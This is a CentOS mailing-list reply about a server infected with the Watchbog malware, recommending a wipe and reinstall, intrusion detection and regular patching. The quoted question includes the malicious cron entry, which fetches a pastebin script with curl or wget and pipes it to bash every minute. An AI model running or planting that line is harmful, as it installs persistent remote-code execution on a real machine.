[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Mon Dec 17 21:58:03 UTC 2018
Pete Biggs <pete at biggs.org.uk>

> Is there a way to find out how the CentOS 7.5 Linux box got infected with
> malware?
> Currently I am referring to
> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
> to carry out the steps below, which are done manually.
> 
> 1) rm -fr /tmp/*timesyncc.service*
> 2) crontab -e -u apigee
>    delete the cron entry
>    */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
> 3) ps aux | grep watchbog
>    kill -9 $(pidof watchbog)
> 
> Any suggestions or recommendations to find out how the CentOS 7.5 Linux box
> got infected with Watchbog malware?

Well, if the infected crontab is owned by user 'apigee' then it would
suggest that whatever runs as that user is the source of the infection.
The malware appears to try to elevate its privs, and if it's successful
it modifies various system files.  What you are seeing in the 'apigee'
crontab is just the tip of the iceberg.

It is unlikely that what is in that blog will successfully get rid of
all the malware - it will probably stop it running, but your system
will still have the malware on it and it may have left other backdoors
into your system.

The *ONLY* way of being sure your system is clean is to wipe and
reinstall. (And make sure that if you restore from backup, that the
backup is clean.)

> Is there any open source software which can
> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
> 
Yes, lots, although most centre around detecting the intrusion rather
than preventing it - the classic way of detecting intrusions in the
past has been Tripwire, but it's a long time since I used it and there
are no doubt better things around. Search for "linux intrusion
detection tools".

For prevention, by far the best way is to keep your system and
application software up to date.  The intrusions work by elevating
privilege to root, and that elevation requires either a knowledge of
passwords/keys or the ability to leverage vulnerabilities. The first is
mitigated by strong passwords and proper security housekeeping; the
second by regularly updating your system especially with security
updates.

P.